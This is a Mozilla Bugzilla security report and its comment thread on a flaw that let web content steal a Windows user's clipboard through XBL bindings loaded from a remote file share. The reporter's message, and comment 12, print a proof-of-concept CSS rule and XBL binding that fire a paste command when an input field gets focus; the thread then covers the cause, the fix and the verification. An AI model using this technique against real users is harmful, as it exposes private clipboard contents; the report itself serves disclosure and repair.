Closed
Bug 45989
Opened 24 years ago
Closed 24 years ago
stealing user's clipboard on Windows platform
Categories
(Core :: Security, defect, P1)
Tracking
()
VERIFIED
FIXED
M18
People
(Reporter: security-bugs, Assigned: hyatt)
Details
(Keywords: verifyme, Whiteboard: [nsbeta3+][PDTP1] Mitchell, can you verify this?)
I can't make heads or tails of this exploit. Could you take a look? -mls From: Georgi Guninski <joro@nat.bg> To: Mitchell Stoltz <mstoltz@netscape.com> It is possible to steal user's clipboard on Windows platform using XBL. As far as I could test XBL bindings may be loaded only from chrome: and file: protocols. But on Windows the file: protocol allows accessing files residing on remote host using Microsoft Networking. The idea is to modify an event handler on an INPUT element so arbitrary event (in the demo focus() ) to issue a paste command in an INPUT field. Check attached files for demonstration. Note: you must edit the path to clip1.xml in clip3.css so it can be loaded. Reading clipboard You must have some text in the clipboard. input.class1 { behavior: url("file://///YOUR_MSN_SERVER/share/clip1.xml#inputFields"); } <?xml version="1.0"?> <bindings id="htmlBindings" xmlns="http://www.mozilla.org/xbl" xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <binding id="inputFields" extends="resource:/chrome/packages/widget-toolkit/global/content/ platformHTMLBindings.xml#inputFields"> <handlers> <handler type="focus" command="cmd_paste" /> </handlers> </binding> </bindings>
Reporter | ||
Comment 1•24 years ago
|
||
Heikki, this looks like it iunvolves event handling, and I heard you were taking that over. Please reassign if I am mistaken.
Assignee: joki → heikki
Component: Event Handling → Security: General
Was finally able to see this bug (wrong permissions)... Hmm.. I'll think about this, although this might also be the responsibility of the XBL team.
Status: NEW → ASSIGNED
I think this belongs to the XBL land.
Assignee: heikki → hyatt
Status: ASSIGNED → NEW
Assignee | ||
Comment 4•24 years ago
|
||
Holy cow, that's cool! The basic problem is with the command="" shorthand syntax in XBL. If you'd been forced to use explicit script, then you would have been denied access to the controller object, and you wouldn't have been allowed to tell it to do the paste. However with my shorthand syntax, I go ahead and perform the command in C++, so no permissions are checked. This is cool! The fix is to only allow command="..." on chrome URIs. Trivial to patch. Nominating for nsbeta3.
Keywords: nsbeta3
Assignee | ||
Comment 5•24 years ago
|
||
To clarify, the BOUND document needs to be a chrome URI, not the XBL doc. I could be slicker about this and try to gauge the permissions of the bound doc, but for 6.0, it's easier to just turn this feature off for all but chrome docs.
Assignee | ||
Updated•24 years ago
|
Status: NEW → ASSIGNED
Target Milestone: --- → M18
Comment 7•24 years ago
|
||
PDT thinks this is a P1
Priority: P2 → P1
Whiteboard: [nsbeta3+] → [nsbeta3+][PDTP1]
Assignee | ||
Comment 8•24 years ago
|
||
fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Comment 9•24 years ago
|
||
Mitchell, can you verify this?
Whiteboard: [nsbeta3+][PDTP1] → [nsbeta3+][PDTP1] Mitchell, can you verify this?
Reporter | ||
Comment 10•24 years ago
|
||
How do I reproduce this? Is Georgi's example one file or two, and how do I run the exploit?
Updated•24 years ago
|
QA Contact: janc → ckritzer
Comment 12•24 years ago
|
||
Okay, So here's what I gathered from this bug: 1) input.class1 { behavior: url("file://///YOUR_MSN_SERVER/share/clip1.xml#inputFields"); } is what you need to have copied to the clipboard when you load the xml file: <?xml version="1.0"?> <bindings id="htmlBindings" xmlns="http://www.mozilla.org/xbl" xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <binding id="inputFields" extends="resource:/chrome/packages/widget-toolkit/global/content/ platformHTMLBindings.xml#inputFields"> <handlers> <handler type="focus" command="cmd_paste" /> </handlers> </binding> </bindings> which will named and placed in the path described in the text which should be copied to the clipboard. Okay, and after all that, the bug is Verified FIXED on: Win98SE 2001-02-13-06-Mtrunk
Status: RESOLVED → VERIFIED
Updated•7 years ago
|
Group: netscapeconfidential
You need to log in
before you can comment on or make changes to this bug.
Description
•